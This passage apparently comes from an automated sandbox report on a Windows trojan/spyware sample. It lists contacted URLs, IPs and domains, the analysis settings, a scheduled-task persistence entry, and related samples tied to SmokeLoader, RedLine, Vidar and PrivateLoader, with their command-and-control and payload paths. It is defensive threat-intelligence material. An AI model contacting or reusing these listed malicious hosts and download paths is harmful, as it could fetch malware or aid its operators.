Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/InitDisplayResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/SetEnvironmentLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ConfirmMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://curl.se/Vsetup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1971194426.000000006B4CC000.00000040.00000001.01000000.00000009.sdmp, libcurl.dll.1.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/CheckConnectLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyxMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://t.gogamec.com/2302/sqlite.dat&r3Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/ExtensionDefendersResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionHardwaresMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.sectigo.com0Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionSteamFilesLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.40.141.211
                  gmpeople.comGermany
                  24940HETZNER-ASDEtrue
                  172.67.133.215
                  wfsdragon.ruUnited States
                  13335CLOUDFLARENETUSfalse
                  45.133.1.107
                  unknownNetherlands
                  35913DEDIPATH-LLCUSfalse
                  162.159.133.233
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  45.142.215.47
                  unknownRussian Federation
                  202933CLOUDSOLUTIONSRUtrue
                  172.67.132.113
                  iplogger.orgUnited States
                  13335CLOUDFLARENETUSfalse
                  208.95.112.1
                  ip-api.comUnited States
                  53334TUT-ASUSfalse
                  162.159.130.233
                  cdn.discordapp.comUnited States
                  13335CLOUDFLARENETUSfalse
                  172.67.19.24
                  pastebin.comUnited States
                  13335CLOUDFLARENETUStrue
                  45.9.20.13
                  unknownRussian Federation
                  35913DEDIPATH-LLCUStrue
                  135.181.129.119
                  unknownGermany
                  24940HETZNER-ASDEtrue
                  51.178.186.149
                  unknownFrance
                  16276OVHFRfalse
                  IP
                  127.0.0.1
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1496480
                  Start date and time:2024-08-21 10:56:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 14m 57s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:61
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@94/64@66/13
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 205
                  • Number of non-executed functions: 229
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): WerFault.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 2.18.97.153, 20.189.173.21
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  04:57:07API Interceptor14x Sleep call for process: powershell.exe modified
                  04:57:09API Interceptor145x Sleep call for process: Mon17c604381c7047e.exe modified
                  04:57:10API Interceptor4027x Sleep call for process: Mon17742f90b916675f2.exe modified
                  04:57:12API Interceptor17x Sleep call for process: Mon1795d04d4bd.exe modified
                  04:57:14API Interceptor3x Sleep call for process: svchost.exe modified
                  04:57:15API Interceptor1289951x Sleep call for process: Mon178817e243.exe modified
                  04:57:18API Interceptor1890x Sleep call for process: explorer.exe modified
                  04:57:24API Interceptor1368312x Sleep call for process: Mon1785436ae78.exe modified
                  04:57:27API Interceptor2x Sleep call for process: WerFault.exe modified
                  04:57:36API Interceptor74x Sleep call for process: Mon17b5f403be4d8d6b.exe modified
                  09:57:48Task SchedulerRun new task: Firefox Default Browser Agent 116A150CA183DEAE path: C:\Users\user\AppData\Roaming\bgjifes
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.40.141.211vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                  • selebration17io.io/index.php
                  Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
                  • selebration17io.io/index.php
                  br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
                  • selebration17io.io/index.php
                  setup.exeGet hashmaliciousBabuk, DjvuBrowse
                  • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                  SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                  • agressivemnaiq.xyz/
                  A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  • host-data-coin-11.com/
                  be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • host-data-coin-11.com/
                  EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  • host-data-coin-11.com/
                  LisectAVT_2403002B_303.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  • aucmoney.com/upload/
                  LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
                  • trad-einmyus.com/index.php
                  172.67.133.215611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
                  • wfsdragon.ru/api/setStats.php
                  sotema_5.txt.exeGet hashmaliciousAmadey, Fabookie, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLineBrowse
                  • wfsdragon.ru/api/setStats.php
                  Trojan-PSW.Win32.Racealer.lly-e47bfa7b58706ed.exeGet hashmaliciousAmadey, FFDroider, ManusCrypt, Nitol, PrivateLoader, Raccoon Stealer v2, RedLineBrowse
                  • wfsdragon.ru/api/setStats.php
                  HEUR-Trojan-Spy.Win32.Fbkatz.gen-cfc689df6491.exeGet hashmaliciousAmadey, CryptOne, ManusCrypt, Nymaim, PrivateLoader, RedLine, TofseeBrowse
                  • wfsdragon.ru/api/setStats.php
                  16F1F5B4DE94BC49205E1CDD8ADB3B4ED2C482952CA07.exeGet hashmaliciousPrivateLoaderBrowse
                  • /api/setStats.php
                  65341B1F7F4018E163E564B546012D5BFA41A70C9B992.exeGet hashmaliciousPrivateLoader, RedLine, VidarBrowse
                  • wfsdragon.ru/api/setStats.php
                  oslXRFLiaD.exeGet hashmaliciousPrivateLoaderBrowse
                  • wfsdragon.ru/api/setStats.php
                  15F4E965344A38B07713363133E6624F72DB10CB29796.exeGet hashmaliciousRedLine VidarBrowse
                  • wfsdragon.ru/api/setStats.php
                  3D898349908143BEF8F7652DADA13C6075F84AF469349.exeGet hashmaliciousRedLine VidarBrowse
                  • wfsdragon.ru/api/setStats.php
                  47E9B75457446A3B3C86622DD282065B0F88603E2C009.exeGet hashmaliciousSmokeLoader VidarBrowse
                  • wfsdragon.ru/api/setStats.php
                  45.133.1.10733CBD9E39DD39A84D0426897605B17000046E0FB14399.exeGet hashmaliciousBackstage Stealer RedLine VidarBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  iCm814vnxp.exeGet hashmaliciousUnknownBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  kOwtqMS5Yn.exeGet hashmaliciousUnknownBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  423ADCAA5B1076A3871837BCFC61177CDDEC9C5F30E34.exeGet hashmaliciousBackstage Stealer RedLine SmokeLoader Socelars VidarBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  71A117DE440384FDC4B8FB690FC73674E9E2A9A75E689.exeGet hashmaliciousBackstage Stealer SmokeLoader Vidar XmrigBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  593D376336BB37228ECD2B7C5D46A2EF965C04F33DF04.exeGet hashmaliciousRedLine SmokeLoader Socelars VidarBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  HxV2jjWxxh.exeGet hashmaliciousCyberduck Metasploit Raccoon RedLine SocelarsBrowse
                  • 45.133.1.107/server.txt
                  FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exeGet hashmaliciousSmokeLoader VidarBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousCryptbot RedLine SmokeLoader VidarBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  Setup.exeGet hashmaliciousUnknownBrowse
                  • 45.133.1.107/download/NiceProcessX64.bmp
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  cdn.discordapp.com3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                  • 162.159.130.233
                  ExeFile (274).exeGet hashmaliciousUnknownBrowse
                  • 162.159.135.233
                  ExeFile (308).exeGet hashmaliciousUnknownBrowse
                  • 162.159.134.233
                  ExeFile (308).exeGet hashmaliciousUnknownBrowse
                  • 162.159.129.233
                  sz4ypfkelT.exeGet hashmaliciousUnknownBrowse
                  • 162.159.133.233
                  sz4ypfkelT.exeGet hashmaliciousUnknownBrowse
                  • 162.159.134.233
